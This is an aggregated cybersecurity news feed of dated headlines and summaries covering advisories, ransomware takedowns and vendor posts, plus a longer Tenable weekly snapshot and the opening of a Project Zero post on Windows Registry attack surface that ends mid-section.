The internet is rife with hidden threats that often go undetected until they strike – unless you know where to look. In a remarkable case of DNS Zero-Day Infostealer Detection, EfficientIP’s DNS Threat Intelligence exposed and blocked a previously unknown infostealer that leverages DNS infrastructure for data exfiltration while evading traditional detection mechanisms, slipping past… The post DNS Zero-Day Infostealer Detection by Threat Intelligence: Deep Dive appeared first on EfficientIP.

https://efficientip.com/blog/dns-threat-intelligence-exposed-an-infostealer-deep-dive/
Where hyperscale hardware goes to retire: Ars visits a very big ITAD site
2025-05-26T11:30:50Z | 1748259050

Watching memory DIMMs get sorted like Wonka children inside SK TES' facility.

https://arstechnica.com/information-technology/2025/05/where-hyperscale-hardware-goes-to-retire-ars-visits-a-very-big-itad-site/
Vulnerability in Be-Tech Mifare Classic cards software
2025-05-26T11:00:00Z | 1748257200

Cleartext Storage of Sensitive Information vulnerability (CVE-2025-4053) has been found in Be-Tech Mifare Classic cards software.

https://cert.pl/en/posts/2025/05/CVE-2025-4053/
The Value of Data Enrichment in Cybersecurity Data
2025-05-26T10:55:15Z | 1748256915

You’re standing in the grocery store, comparing the nutrition information for two different cereals. The enriched wheat bran cereal has more B12 vitamin content than your favorite sugary one. As an adult, you know that your body needs the additional vitamins in the enriched bran flakes, even if you really want that fruity, sugary hit […] The post The Value of Data Enrichment in Cybersecurity Data appeared first on Graylog.

https://graylog.org/post/the-value-of-data-enrichment-in-cybersecurity-data/
A Starter Guide to Protecting Your Data From Hackers and Corporations
2025-05-26T10:30:00Z | 1748255400

Hackers. AI data scrapes. Government surveillance. Thinking about where to start when it comes to protecting your online privacy can be overwhelming. Here’s a simple guide for you—and anyone who claims they have nothing to hide.

https://www.wired.com/story/guide-protect-data-from-hackers-corporations/
Project Management in OT/ICS Projects with IEC 62443 and MITRE ATT&CK using Radiflow
2025-05-26T06:31:08Z | 1748241068

What is Project Management in OT/ICS? Project management in OT/ICS is the structured execution of engineering, automation, and cybersecurity initiatives within industrial environments. These projects have a clear start and end point, and typically deliver a service or result, not just a product. In this context, managing an OT cybersecurity project aligned with IEC 62443 […] The post Project Management in OT/ICS Projects with IEC 62443 and MITRE ATT&CK using Radiflow appeared first on Radiflow.

https://www.radiflow.com/blog/project-management-ot-iec-62443-mitre-attack/
School Shooting Tragedies: What Can Be Learned About Prevention
2025-05-26T04:00:00Z | 1748232000

Education industry security leader shares things to consider after a major incident.

https://www.securitymagazine.com/articles/101644-school-shooting-tragedies-what-can-be-learned-about-prevention
Lessons from the Cleo Exploit: Evidence Underscores Why Secure MFT is Critical
2025-05-26T04:00:00Z | 1748232000

In December 2024, cybersecurity researchers uncovered an alarming zero-day remote code execution (RCE) vulnerability in Cleo’s managed file transfer products, as first reported by CSO Online.

https://www.opswat.com/blog/lessons-from-the-cleo-exploit-evidence-underscores-why-secure-mft-is-critical
Join OPSWAT at the OT Cyber Resilience Summit NSW 2025
2025-05-26T03:34:00Z | 1748230440

OPSWAT is heading to Sydney for the OT Cyber Resilience Summit NSW 2025, and we’re excited to connect with security leaders and critical infrastructure operators from across the region.

https://www.opswat.com/blog/join-opswat-at-the-ot-cyber-resilience-summit-nsw-2025
Bulletin d'actualité CERTFR-2025-ACT-022 (26 mai 2025)
2025-05-26T00:00:00Z | 1748217600

Ce bulletin d'actualité du CERT-FR revient sur les vulnérabilités significatives de la semaine passée pour souligner leurs criticités. Il ne remplace pas l'analyse de l'ensemble des avis et alertes publiés par le CERT-FR dans le cadre d'une analyse de risques pour prioriser l'application des...

https://www.cert.ssi.gouv.fr/actualite/CERTFR-2025-ACT-022/
Last 24 hours: TechCrunch Disrupt 2025 Early Bird deals will fly away after today
2025-05-25T14:00:00Z | 1748181600

Just 24 hours left to lock in Early Bird pricing for TechCrunch Disrupt 2025 — happening October 27–29 at Moscone West in San Francisco. Save up to $900 on your pass, or bring someone brilliant with you for 90% off their ticket. This deal ends tonight at 11:59 p.m. PT. Grab your Early Bird discount […]

https://techcrunch.com/2025/05/25/last-24-hours-techcrunch-disrupt-2025-early-bird-deals-will-fly-away-after-today/
Black Basta Ransomware Leak: Key Findings and Insights
2025-05-25T00:30:00Z | 1748133000

A leak of 200,000 internal Black Basta chat messages reveals how a modern ransomware group structures its operations to attack victims, employing a range of tactics that, theoretically, should be easy to defend against.

https://www.first.org/blog/20250321-black-basta-ransomware-leak
The US Is Building a One-Stop Shop for Buying Your Data
2025-05-24T10:30:00Z | 1748082600

Plus: A mysterious hacking group’s secret client is exposed, Signal takes a swipe at Microsoft Recall, Russian hackers target security cameras to spy on aid to Ukraine, and more.

https://www.wired.com/story/us-spies-one-stop-shop-private-data/
U.S. Dismantles DanaBot Malware Network, Charges 16 in $50M Global Cybercrime Operation
2025-05-24T03:18:25Z | 1748056705

The U.S. Department of Justice (DoJ) on Thursday announced the disruption of the online infrastructure associated with DanaBot (aka DanaTools) and unsealed charges against 16 individuals for their alleged involvement in the development and deployment of the malware, which it said was controlled by a Russia-based cybercrime organization. The malware, the DoJ said, infected more […]

https://thecyberpost.com/news/hackers/u-s-dismantles-danabot-malware-network-charges-16-in-50m-global-cybercrime-operation/
300 Servers and €3.5M Seized as Europol Strikes Ransomware Networks Worldwide
2025-05-24T03:17:46Z | 1748056666

May 23, 2025Ravie LakshmananRansomware / Dark Web As part of the latest “season” of Operation Endgame, a coalition of law enforcement agencies have taken down about 300 servers worldwide, neutralized 650 domains, and issued arrest warrants against 20 targets. Operation Endgame, first launched in May 2024, is an ongoing law enforcement operation targeting services and […]

https://thecyberpost.com/news/hackers/300-servers-and-e3-5m-seized-as-europol-strikes-ransomware-networks-worldwide/
Naukri exposed recruiter email addresses, researcher says
2025-05-24T02:30:00Z | 1748053800

The recruiter website fixed the email address exposure earlier this week.

https://techcrunch.com/2025/05/23/naukri-exposed-recruiter-email-addresses-researcher-says/
[Control systems] Siemens security advisory (AV25-291)
2025-05-23T20:15:15Z | 1748031315

https://cyber.gc.ca/en/alerts-advisories/control-systems-siemens-security-advisory-av25-291
Feds charge 16 Russians allegedly tied to botnets used in cyberattacks and spying
2025-05-23T19:56:45Z | 1748030205

An example of how a single malware operation can enable both criminal and state-sponsored hacking.

https://arstechnica.com/security/2025/05/feds-charge-16-russians-allegedly-tied-to-botnets-used-in-cyberattacks-and-spying/
Researchers cause GitLab AI developer assistant to turn safe code malicious
2025-05-23T19:06:59Z | 1748027219

AI assistants can't be trusted to produce safe code.

https://arstechnica.com/security/2025/05/researchers-cause-gitlab-ai-developer-assistant-to-turn-safe-code-malicious/
Google’s Will Smith double is better at eating AI spaghetti … but it’s crunchy?
2025-05-23T17:57:13Z | 1748023033

Veo 3 is a major leap in AI video synthesis, but the sound effects need more cooking time.

https://arstechnica.com/ai/2025/05/googles-will-smith-double-is-better-at-eating-ai-spaghetti-but-its-crunchy/
Think You’re Covered? 40% of Cyber Insurance Claims Say Otherwise
2025-05-23T17:53:03Z | 1748022783

Data breaches are a devastating experience for any company – you lose revenue, hundreds of hours of productivity, customer confidence, and sleep, as you try to undo the damage.  One small comfort is that a payout from your cybersecurity insurance will offset some of your lost revenue—or will it? A recent analysis reveals that 40%… The post Think You’re Covered? 40% of Cyber Insurance Claims Say Otherwise appeared first on Portnox.

https://www.portnox.com/blog/compliance-regulations/think-youre-covered-40-of-cyber-insurance-claims-say-otherwise/
How to Use NAC for Microsegmentation
2025-05-23T17:42:28Z | 1748022148

As threats become more sophisticated and networks more distributed, traditional segmentation strategies no longer offer adequate protection. Flat networks or coarse segmentation can give attackers free rein once they gain access. Microsegmentation offers a modern solution, and with Network Access Control (NAC), it becomes scalable and enforceable. Microsegmentation is the practice of dividing a network… The post How to Use NAC for Microsegmentation appeared first on Portnox.

https://www.portnox.com/blog/network-access-control/how-to-use-nac-for-microsegmentation/
Why Consumers Rarely Win Lawsuits After a Data Breach — and What It Means for Your Security Strategy
2025-05-23T17:33:47Z | 1748021627

As a security professional, you’ve probably fielded your fair share of frustrated questions from friends and family: “My data was in that breach — can I sue?” The short answer? Probably not. Even as data breaches grow in frequency and impact, the chances of individual consumers successfully suing breached companies remain vanishingly small. That’s not… The post Why Consumers Rarely Win Lawsuits After a Data Breach — and What It Means for Your Security Strategy appeared first on Portnox.

https://www.portnox.com/blog/compliance-regulations/why-consumers-rarely-win-lawsuits-after-a-data-breach/
Skyhigh Security Named In The 2025 Magic Quadrant For Security Service Edge
2025-05-23T16:19:49Z | 1748017189

We’re thrilled to share that Skyhigh Security has been recognized in the 2025 Gartner® Magic Quadrant™ for Security Service Edge... The post Skyhigh Security Named In The 2025 Magic Quadrant For Security Service Edge appeared first on Skyhigh Security.

https://www.skyhighsecurity.com/industry-perspectives/skyhigh-security-named-in-the-2025-magic-quadrant-for-security-service-edge.html
How Organizations Can Stay Secure This Memorial Day Weekend
2025-05-23T16:00:00Z | 1748016000

As Memorial Day Weekend approaches, many organizations prepare for a well-deserved break. But while employees take time off, cybercriminals get to work.

https://www.securitymagazine.com/articles/101642-how-organizations-can-stay-secure-this-memorial-day-weekend
A 3X Leader in Gartner 2025 Magic Quadrant for SSE
2025-05-23T15:20:02Z | 1748013602

Palo Alto Networks has been named a Leader in the 2025 Gartner Magic Quadrant for Security Service Edge, for the third time. The post A 3X Leader in Gartner 2025 Magic Quadrant for SSE appeared first on Palo Alto Networks Blog.

https://www.paloaltonetworks.com/blog/2025/05/3x-leader-gartner-2025-magic-quadrant-sse/
Effective Deception for Zero Day Attacks: Strategies for Cyber Defense
2025-05-23T14:51:11Z | 1748011871

Learn how deception for zero day attacks helps detect and divert hidden threats before they cause damage. Boost your active defense strategy today. The post Effective Deception for Zero Day Attacks: Strategies for Cyber Defense appeared first on Fidelis Security.

https://fidelissecurity.com/threatgeek/cyberattacks/deception-for-zero-day-attacks/
US healthcare firm postponed procedures after cyber attack knocked systems offline
2025-05-23T14:19:57Z | 1748009997

The incident at Kettering Health disrupted procedures for patients

https://www.itpro.com/security/cyber-attacks/us-healthcare-firm-postponed-procedures-after-cyber-attack-knocked-systems-offline
Scanning the public web and dark web for ransomware infrastructure in Silent Push Community Edition
2025-05-23T14:06:25Z | 1748009185

If you’re an independent security researcher, blogger, or part of a security team conducting initial investigations, Silent Push Community Edition is a free threat hunting tool that gives you the ability to locate and traverse malicious infrastructure across the public internet (“clear web”) and dark web simultaneously, and uncover hidden domains and IPs for further investigation.  […] The post Scanning the public web and dark web for ransomware infrastructure in Silent Push Community Edition  appeared first on Silent Push.

https://www.silentpush.com/blog/public-web-and-dark-web-scanning/
Scanning the public web and dark web for ransomware infrastructure in Silent Push Community Edition
2025-05-23T14:06:25Z | 1748009185

If you’re an independent security researcher, blogger, or part of a security team conducting initial investigations, Silent Push Community Edition is a free threat hunting tool that gives you the ability to locate and traverse malicious infrastructure across the public internet (“clear web”) and dark web simultaneously, and uncover hidden domains and IPs for further investigation.  […] The post Scanning the public web and dark web for ransomware infrastructure in Silent Push Community Edition  appeared first on Silent Push.

https://www.silentpush.com/blog/public-web-and-dark-web-scanning/
Silent Ransom Group Targeting Law Firms
2025-05-23T14:00:00Z | 1748008800

Silent Ransom Group Targeting Law Firms

https://www.ic3.gov/CSA/2025/250523.pdf
CERT-SE:s veckobrev v.21
2025-05-23T13:23:00Z | 1748006580

I veckans nyhetssvep rapporteras det om flera internationella insatser för att störa cyberkriminell aktivitet. Utöver detta, en hel drös läsvärda rapporter om allt från analyser av utpressningsangrepp till hur man bör agera när det är dags att ta digitala tillgångar av olika slag ur drift.

https://www.cert.se/2025/05/cert-se-veckobrev-v21.html
Information About Upcoming Merger of LeanIX GmbH into SAP SE
2025-05-23T13:13:28Z | 1748006008

Publication of SAP SE, Walldorf, pursuant to Sec. 62 para. 3 sent. 2 half sent. 1 UmwG

https://news.sap.com/2025/05/information-about-upcoming-merger-of-leanix-gmbh-into-sap-se/
The Good, the Bad and the Ugly in Cybersecurity – Week 21
2025-05-23T13:00:49Z | 1748005249

Law enforcement seizes Lumma infrastructure, threat actor exploits cloud subdomains to spread malware, and Russia's GRU targets Ukraine aid efforts.

https://www.sentinelone.com/blog/the-good-the-bad-and-the-ugly-in-cybersecurity-week-21-6/
Celebrating and Honoring Memorial Day
2025-05-23T13:00:00Z | 1748005200

We are proud to honor and pay tribute to fallen veterans. The post Celebrating and Honoring Memorial Day appeared first on Commvault - English - United States.

https://www.commvault.com/blogs/celebrating-and-honoring-memorial-day-2025
Cybersecurity Snapshot: AI Data Security Best Practices Released, While New Framework Seeks To Help IT Pros Gain Cyber Skills
2025-05-23T13:00:00Z | 1748005200

Check out expert recommendations for protecting your AI system data. Plus, boost your IT department’s cybersecurity skills with a new interactive framework. In addition, learn about a malware campaign targeting critical infrastructure orgs. And get the latest on Russian cyber espionage and on a NIST effort to enhance vulnerability prioritization.Dive into five things that are top of mind for the week ending May 23.1 - Cyber agencies offer AI data security best practicesWith organizations gleefully deploying artificial intelligence (AI) tools to enhance their operations, cybersecurity teams face the critical task of securing AI data.If your organization is looking for guidance on how to protect the data used in AI systems, check out new best practices released this week by cyber agencies from Australia, New Zealand, the U.K. and the U.S.“This guidance is intended primarily for organizations using AI systems in their operations, with a focus on protecting sensitive, proprietary or mission-critical data,” reads the document titled “AI Data Security: Best Practices for Securing Data Used to Train & Operate AI Systems.”“The principles outlined in this information sheet provide a robust foundation for securing AI data and ensuring the reliability and accuracy of AI-driven outcomes,” it adds. By drafting this guidance, the authoring agencies seek to accomplish three goals:Create awareness about data security risks involved in developing, testing and deploying AI systems.Offer best practices for securing data throughout the AI lifecycle.Promote the adoption of strong data-security techniques and of risk-mitigation strategies.Here’s a small sampling of recommended best practices in the 22-page document:Use trusted, reliable data source for training your AI models and adopt provenance-tracking to trace the training-data origins.Employ checksums and cryptographic hashes to maintain the AI data’s integrity during storage and transmission.Adopt digital signatures to prevent unauthorized third-parties from tampering with the AI data.For more information about AI data security, check out these Tenable resources:“Harden Your Cloud Security Posture by Protecting Your Cloud Data and AI Resources” (blog)“Tenable Cloud AI Risk Report 2025” (report)“Who's Afraid of AI Risk in Cloud Environments?” (blog)“Tenable Cloud AI Risk Report 2025: Helping You Build More Secure AI Models in the Cloud” (on-demand webinar)“Securing the AI Attack Surface: Separating the Unknown from the Well Understood” (blog)2 - Framework maps cyber skills across 14 IT rolesSecurity skills must extend beyond an organization’s cyber team and across your IT department – but how?It’s a question that the Linux Foundation and the Open Source Security Foundation have tried to answer with a new reference framework that maps required cyber skills across 14 IT department roles.The new “Cybersecurity Skills Framework,” available via an interactive web interface, is meant to be a “starting point” for organizations to then adjust the framework’s guidance based on their specific needs and requirements.“The framework provides leaders with an easy way to understand the cybersecurity skills needed, quickly identify knowledge gaps, and incorporate critical skills into all of their IT roles,” the Linux Foundation and OpenSSF said in a statement. “By establishing a shared language for cybersecurity readiness, the framework prepares everyone who touches a system to take responsibility for security, not just the cybersecurity specialists,” the organizations added.The required cyber skills are organized into three categories for each IT role: basic, intermediate and advanced. For example, for a web developer the framework lists nine basic cybersecurity skills, seven intermediate ones and five advanced ones. Cybersecurity skills for a web developer include:Basic: Adopt input validation and injection prevention techniques to prevent vulnerabilities like cross-site scripting and SQL injection.Intermediate: Implementing scanning and testing throughout the development lifecycle.Advanced: Deepen advanced cryptographic techniques such as digital signatures and hashing algorithms.For more information about cybersecurity skills enterprises need today:“5 Essential Cybersecurity Skills Every IT Professional Should Master” (Ascend Education)“5 Cybersecurity Skills Every IT Professional Should Master” (WebAsha Technologies)“The Most In-Demand Cybersecurity Skills” (Dice)“10 must-have cybersecurity skills for career success in 2025” (TechTarget)“Why Cybersecurity Skills Are Essential for Entry-Level Tech Roles in 2025” (EC-Council)3 - Alert: LummaC2 malware used against critical infrastructureCyber attackers are deploying the LummaC2 malware in an attempt to breach the networks of U.S. critical infrastructure organizations and steal sensitive data.The U.S. Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) issued the warning this week in a joint advisory that outlines attackers’ TTPs and indicators of compromise, along with recommended mitigations.“LummaC2 malware is able to infiltrate victim computer networks and exfiltrate sensitive information, threatening vulnerable individuals’ and organizations’ computer networks across multiple U.S. critical infrastructure sectors,” the advisory reads. Cyber attackers use spearphishing methods to trick victims into downloading legit-looking apps that contain the LummaC2 malware, which has been available in cybercriminal forums since 2022. The malware’s obfuscation methods allow it to bypass standard cyber controls.“Once a victim’s computer system is infected, the malware can exfiltrate sensitive user information, including personally identifiable information, financial credentials, cryptocurrency wallets, browser extensions, and multifactor authentication (MFA) details without immediate detection,” the advisory reads.Mitigation recommendations include:Monitor and detect anomalous behavior, such as API calls that try to retrieve system information.Implement application controls, such as allowlisting remote access programs.Adopt phishing-resistant multi-factor authentication.Collect logs to regularly review registry changes and access logs that may signal a LummaC2 malware infection.Regularly update and patch software to remediate critical vulnerabilities.For more information about OT systems cybersecurity, check out these Tenable resources: “What is operational technology (OT)?” (guide)“Discover, Measure, and Minimize the Risk Posed by Your Interconnected IT/OT/IoT Environments” (on-demand webinar)“How To Secure All of Your Assets - IT, OT and IoT - With an Exposure Management Platform” (blog)“Blackbox to blueprint: The security leader’s guidebook to managing OT and IT risk” (white paper)“OT Security Master Class: Understanding the Key Principles, Challenges, and Solutions” (on-demand webinar)4 - Logistics and tech vendors warned about Russian cyber spiesCyber attackers backed by Russia’s GRU military intelligence unit have unleashed an aggressive cyber espionage campaign targeting U.S. and European technology companies and logistics providers involved in delivering aid to Ukraine.That’s according to the joint advisory “Russian GRU Targeting Western Logistics Entities and Technology Companies” published this week by cybersecurity and law enforcement agencies from 11 countries, including Australia, Canada, France, Germany, the U.K. and the U.S.“This cyber espionage-oriented campaign targeting logistics entities and technology companies uses a mix of previously disclosed TTPs and is likely connected to these actors’ wide-scale targeting of IP cameras in Ukraine and bordering NATO nations,” the 33-page document reads. The group carrying out the cyber espionage campaign, known by various names, including APT28 and Fancy Bear, uses multiple tactics, techniques and procedures (TTPs) to gain initial access to victims’ networks, including: brute-force password attackscredential spearphishingmalware deliveryvulnerability exploitationattacks against VPNsThe advisory’s mitigation recommendations include:Segment networks, restrict network access and adopt a zero-trust architectureAutomatically log network access and audit the logs to identify suspicious access requestsImplement allowlisting for applications and scriptsAdopt tools that check the safety of links in emailsUse multi-factor authentication with passkeys or PKI smartcardsLimit the number of administrative accounts Change all default credentialsFor more information about APT28 / Fancy Bear:“APT28” (MITRE ATT&CK)“Fancy Bear 'Nearest Neighbor' Attack Uses Nearby Wi-Fi Network” (Dark Reading)"Fancy Bear (APT28)" (Bugcrowd)"Fancy Bear Goes Phishing: The Dark History of the Information Age, in Five Extraordinary Hacks" (Publishers Weekly)"APT28" (Malpedia)5 - NIST develops metric to predict likelihood of a vulnerability’s exploitationKnowing which vulnerabilities have been exploited in the wild is priceless information for a security team as it prioritizes which ones to patch first.Now, the U.S. National Institute of Standards and Technology has come up with a set of calculations designed to determine a vulnerability’s exploitation chances.“Only a small fraction of the tens of thousands of software and hardware vulnerabilities that are published every year will be exploited. Predicting which ones is important for the efficiency and cost effectiveness of enterprise vulnerability remediation efforts,” reads NIST’s white paper “Likely Exploited Vulnerabilities: A Proposed Metric for Vulnerability Exploitation Probability,” published this week. NIST calls the metric LEV, which stands for “likely exploited vulnerabilities.” LEV, NIST says, may help augment both the Known Exploited Vulnerabilities Catalog (KEV) database and the Exploit Prediction Scoring System (EPSS) by adding entries to the former and enhancing the latter’s accuracy.The LEV equation, which has been implemented using Python and uses data from the National Vulnerability Database (NVD), KEV and EPSS, is “mathematically sound” but its error margin is unknown, so it needs to be rigorously tested, according to NIST.For more information about NIST’s LEV:“NIST's 'LEV' Equation to Determine Likelihood a Bug Was Exploited” (Dark Reading)“NIST Proposes Security Metric to Determine Likely Exploited Vulnerabilities” (Cybersecurity News)“Vulnerability Exploitation Probability Metric Proposed by NIST, CISA Researchers” (SecurityWeek)

https://www.tenable.com/blog/cybersecurity-snapshot-ai-data-security-best-practices-05-23-2025
Top MobSF Alternatives for Mobile App Security Testing | Appknox
2025-05-23T12:42:00Z | 1748004120

Mobile Security Framework (MobSF) is a widely used open-source tool designed to help you perform static and dynamic analysis of Android, iOS, and Windows mobile apps. It’s a popular choice among developers and security teams for identifying vulnerabilities early in the development process.

https://www.appknox.com/blog/top-mobsf-alternatives
Palo Alto Networks to Present at Upcoming Investor Event
2025-05-23T12:30:00Z | 1748003400

SANTA CLARA, Calif. , May 23, 2025 /PRNewswire/ -- Palo Alto Networks (NASDAQ: PANW), the global cybersecurity leader, announced today that members of its management team will be presenting at the following financial community event: Bank of America 2025 Global Technology Conference Tuesday, June

https://investors.paloaltonetworks.com/news-releases/news-release-details/palo-alto-networks-present-upcoming-investor-event-10
Driving Business Resilience with New Finance and Spend Capabilities
2025-05-23T12:30:00Z | 1748003400

SAP is empowering organizations to navigate the complexities of the current landscape and emerge stronger, more adaptable, and better equipped to face the future.

https://news.sap.com/2025/05/driving-business-resilience-new-finance-spend-capabilities/
Unstoppable Together: Partners Will Deliver the Promise of SAP Business Suite
2025-05-23T12:30:00Z | 1748003400

The SAP Global Partner Summit explored how SAP Business Suite will redefine business with a unique Suite-as-a-Service offering.

https://news.sap.com/2025/05/partners-deliver-promise-sap-business-suite/
A New Era of Sustainable Enterprise Management, Powered by Applications, Data, and AI
2025-05-23T12:30:00Z | 1748003400

SAP is transforming how organizations turn sustainability commitments into competitive advantage.

https://news.sap.com/2025/05/new-era-sustainable-enterprise-management-powered-by-applications-data-ai/
The Dangers and Threats of Zero-Day Attacks
2025-05-23T12:26:54Z | 1748003214

Zero-day threats are among the biggest risks in cybersecurity. They occur when a vulnerability—in this case meaning a security flaw or weak point in software or hardware that is unknown to the vendor or developers—is exploited to gain access. They are named as such because the vendor or developer has zero days to fix...

https://www.netscout.com/blog/dangers-and-threats-zero-day-attacks
How Fidelis Deception Turns Your Attack Surface into a Defensive Advantage
2025-05-23T11:45:21Z | 1748000721

Discover why traditional security fails to stop attackers inside your network and how Fidelis Deception accelerates breach detection by exposing threats earlier protecting your critical assets with proactive defense. The post How Fidelis Deception Turns Your Attack Surface into a Defensive Advantage appeared first on Fidelis Security.

https://fidelissecurity.com/threatgeek/deception/change-the-attack-surface-with-deception/
Danabot under the microscope
2025-05-23T11:43:50Z | 1748000630

ESET Research has been tracking Danabot’s activity since 2018 as part of a global effort that resulted in a major disruption of the malware’s infrastructure

https://www.welivesecurity.com/en/videos/danabot-microscope/
Mobiiliga hääletamise testi võitis Balti kett
2025-05-23T11:39:08Z | 1748000348

Eile õhtul lõppes mobiiltelefonidele loodud e-hääletamise rakenduse prototüübi avalik testimine. Kokku osales testhääletusel 2430* inimest 29 eri riigist ning tulemuste põhjal kogus enim toetust Balti kett (1989) 439 häälega, sellele järgnesid Kaali meteoriidi langemine (u 1500 eKR) 423 häälega ja Eesti Vabariigi väljakuulutamine (1918) 420 häälega.

https://ria.ee/uudised/mobiiliga-haaletamise-testi-voitis-balti-kett
Memory Safety KEVs Are Increasing Across Industries
2025-05-23T11:33:54Z | 1748000034

Memory safety vulnerabilities are one of the most prevalent weaknesses in software, and the number of Known Exploited Vulnerabilities (KEVs) across industries are steadily increasing. In a webinar hosted by Dark Reading, RunSafe Security CTO Shane Fry and VulnCheck Security Researcher Patrick Garrity discussed the rise of memory safety vulnerabilities listed in the KEV catalog […] The post Memory Safety KEVs Are Increasing Across Industries appeared first on RunSafe Security.

https://runsafesecurity.com/blog/memory-safety-kevs-increasing/
Vulnerability in Studio Fabryka DobryCMS software
2025-05-23T10:55:00Z | 1747997700

Cross-site Scripting (XSS) vulnerability (CVE-2025-4379) has been found in Studio Fabryka DobryCMS software.

https://cert.pl/en/posts/2025/05/CVE-2025-4379/
Scarcity signals: Are rare activities red flags?
2025-05-23T10:00:34Z | 1747994434

Talos analyzed six months of PowerShell network telemetry and found that rare domains are over three times more likely to be malicious compared to frequently contacted ones.

https://blog.talosintelligence.com/scarcity-signals-are-rare-activities-red-flags/
Threat Brief: CVE-2025-31324 (Updated May 23)
2025-05-23T10:00:14Z | 1747994414

CVE-2025-31324 impacts SAP NetWeaver's Visual Composer Framework. We share our observations on this vulnerability using incident response cases and telemetry. The post Threat Brief: CVE-2025-31324 (Updated May 23) appeared first on Unit 42.

https://unit42.paloaltonetworks.com/threat-brief-sap-netweaver-cve-2025-31324/
It's been a bad week for ransomware operators
2025-05-23T10:00:00Z | 1747994400

A host of ransomware strains have been neutralized, servers seized, and key players indicted

https://www.itpro.com/security/ransomware/its-been-a-bad-week-for-ransomware-operators
Bypassing MTE with CVE-2025-0072
2025-05-23T10:00:00Z | 1747994400

In this post, I’ll look at CVE-2025-0072, a vulnerability in the Arm Mali GPU, and show how it can be exploited to gain kernel code execution even when Memory Tagging Extension (MTE) is enabled. The post Bypassing MTE with CVE-2025-0072 appeared first on The GitHub Blog.

https://github.blog/security/vulnerability-research/bypassing-mte-with-cve-2025-0072/
Bypassing MTE with CVE-2025-0072
2025-05-23T10:00:00Z | 1747994400

In this post, I’ll look at CVE-2025-0072, a vulnerability in the Arm Mali GPU, and show how it can be exploited to gain kernel code execution even when Memory Tagging Extension (MTE) is enabled. The post Bypassing MTE with CVE-2025-0072 appeared first on The GitHub Blog.

https://github.blog/security/vulnerability-research/bypassing-mte-with-cve-2025-0072/
“If your vendor is vulnerable, so are you”: S-RM and Ethixbase360 outline five critical steps to secure third-party cyber risk
2025-05-23T09:54:12Z | 1747994052

M&S disclose hackers gained entry via a third-party, amid series of attacks on major UK retailer

https://www.s-rminform.com/news/s-rm-and-ethixbase360-outline-five-critical-steps-to-secure-third-party-cyber-risk
3AM ransomware attack poses as a call from IT support to compromise networks
2025-05-23T09:08:14Z | 1747991294

Cybercriminals are getting smarter. Not by developing new types of malware or exploiting zero-day vulnerabilities, but by simply pretending to be helpful IT support desk workers. Find out how they do it in my article on the Tripwire State of Security blog.

https://www.tripwire.com/state-of-security/3am-ransomware-attackers-pose-it-support-compromise-networks
The Windows Registry Adventure #7: Attack surface analysis
2025-05-23T09:05:00Z | 1747991100

Posted by Mateusz Jurczyk, Google Project Zero In the first three blog posts of this series, I sought to outline what the Windows Registry actually is, its role, history, and where to find further information about it. In the subsequent three posts, my goal was to describe in detail how this mechanism works internally – from the perspective of its clients (e.g., user-mode applications running on Windows), the regf format used to encode hives, and finally the kernel itself, which contains its canonical implementation. I believe all these elements are essential for painting a complete picture of this subsystem, and in a way, it shows my own approach to security research. One could say that going through this tedious process of getting to know the target unnecessarily lengthens the total research time, and to some extent, they would be right. On the other hand, I believe that to conduct complete research, it is equally important to answer the question of how certain things are implemented, as well as why they are implemented that way – and the latter part often requires a deeper dive into the subject. And since I have already spent the time reverse engineering and understanding various internal aspects of the registry, there are great reasons to share the information with the wider community. There is a lack of publicly available materials on how various mechanisms in the registry work, especially the most recent and most complicated ones, so I hope that the knowledge I have documented here will prove useful to others in the future. In this blog post, we get to the heart of the matter, the actual security of the Windows Registry. I'd like to talk about what made a feature that was initially meant to be just a quick test of my fuzzing infrastructure draw me into manual research for the next 1.5 ~ 2 years, and result in Microsoft fixing (so far) 53 CVEs. I will describe the various areas that are important in the context of low-level security research, from very general ones, such as the characteristics of the codebase that allow security bugs to exist in the first place, to more specific ones, like all possible entry points to attack the registry, the impact of vulnerabilities and the primitives they generate, and some considerations on effective fuzzing and where more bugs might still be lurking. Let's start with a quick recap of the registry's most fundamental properties as an attack surface: Local attack surface for privilege escalation: As we already know, the Windows Registry is a strictly local attack surface that can potentially be leveraged by a less privileged process to gain the privileges of a higher privileged process or the kernel. It doesn't have any remote components except for the Remote Registry service, which is relatively small and not accessible from the Internet on most Windows installations.Complex, old codebase in a memory-unsafe language: The Windows Registry is a vast and complex mechanism, entirely written in C, most of it many years ago. This means that both logic and memory safety bugs are likely to occur, and many such issues, once found, would likely remain unfixed for years or even decades.Present in the core NT kernel: The registry implementation resides in the core Windows kernel executable (ntoskrnl.exe), which means it is not subject to mitigations like the win32k lockdown. Of course, the reachability of each registry bug needs to be considered separately in the context of specific restrictions (e.g., sandbox), as some of them require file system access or the ability to open a handle to a specific key. Nevertheless, being an integral part of the kernel significantly increases the chances that a given bug can be exploited.Most code reachable by unprivileged users: The registry is a feature that was created for use by ordinary user-mode applications. It is therefore not surprising that the vast majority of registry-related code is reachable without any special privileges, and only a small part of the interface requires administrator rights. Privilege escalation from medium IL (Integrity Level) to the kernel is probably the most likely scenario of how a registry vulnerability could be exploited.Manages sensitive information: In addition to the registry implementation itself being complex and potentially prone to bugs, it's important to remember that the registry inherently stores security-critical system information, including various global configurations, passwords, user permissions, and other sensitive data. This means that not only low-level bugs that directly allow code execution are a concern, but also data-only attacks and logic bugs that permit unauthorized modification or even disclosure of registry keys without proper permissions.Not trivial to fuzz, and not very well documented: Overall, it seems that the registry is not a very friendly target for bug hunting without any knowledge of its internals. At the same time, obtaining the information is not easy either, especially for the latest registry mechanisms, which are not publicly documented and learning about them basically boils down to reverse engineering. In other words, the entry bar into this area is quite high, which can be an advantage or a disadvantage depending on the time and commitment of a potential researcher.Security properties The above cursory analysis seems to indicate that the registry may be a good audit target for someone interested in EoP bugs on Windows.  Let's now take a closer look at some of the specific low-level reasons why the registry has proven to be a fruitful research objective.Broad range of bug classes Due to the registry being both complex and a central mechanism in the system operating with kernel-mode privileges, numerous classes of bugs can occur within it. An example vulnerability classification is presented below: Hive memory corruption: Every invasive operation performed on the registry (i.e., a "write" operation) is reflected in changes made to the memory-mapped view of the hive's structure. Considering that objects within the hive include variable-length arrays, structures with counted references, and references to other cells via cell indexes (hives' equivalent of memory pointers), it's natural to expect common issues like buffer overflows or use-after-frees.Pool memory corruption: In addition to hive memory mappings, the Configuration Manager also stores a significant amount of information on kernel pools. Firstly, there are cached copies of certain hive data, as described in my previous blog post. Secondly, there are various auxiliary objects, such as those allocated and subsequently released within a single system call. Many of these objects can fall victim to memory management bugs typical of the C language.Information 